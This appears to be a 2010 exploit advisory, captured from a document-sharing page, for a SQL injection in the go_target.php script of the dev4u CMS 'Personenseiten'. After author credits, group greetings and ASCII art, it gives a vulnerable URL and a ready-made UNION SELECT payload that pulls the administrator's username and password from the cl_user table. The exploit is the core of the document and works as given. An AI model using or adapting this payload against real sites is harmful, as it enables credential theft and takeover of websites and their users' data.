Loading ...
Global Do...
News & Politics
6
0
Try Now
Log In
Pricing
1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−Information−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 2 +Name : dev4u CMS (Personenseiten) go_target.php SQL Injection 3 +Autor : Easy Laster 4 +Date : 06.03.2010 5 +Script : dev4u CMS Personenseiten 6 +Download Site : http://www.dev4u.de/cms/personenseiten.php 7 +Price : 595M−^@ 8 +Language :PHP 9 +Discovered by Easy Laster 10 +Security Group 4004−Security−Project 11 +Greetz to Team−Internet ,Underground Agents 12 +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, 13 Kiba,−tmh−,Dr Chaos,HANN!BAL,Kabel,−=Player=−,Lidloses_Auge, 14 N00bor,novaca!ne. 15 16 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 17 18 ___ ___ ___ ___ _ _ _____ _ _ 19 | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ 20 |_ | | | | |_ |___|_ −| −_| _| | | _| | _| | |___| __| _| . | | | −_| _| _| 21 |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| 22 |___| |___| 23 24 25 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 26 +Vulnerability : www.site.com/dev4u/go_target.php?go_target=texte&kontent_id=999999’ 27 28 +Exploitable : www.site.com/dev4u/go_target.php?go_target=texte&kontent_id=9999999’ 29 +union+select+1,2,3,4,5,6,7,8,concat(user_name,0x3a,passwort),10,11,12,13,14,15,16+from+ 30 cl_user+where+user_id=1−−+&v=print 31 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− Page 1/1 dev4u CMS Personenseiten go_target.php SQL Injection Easy Laster 03/06/2010
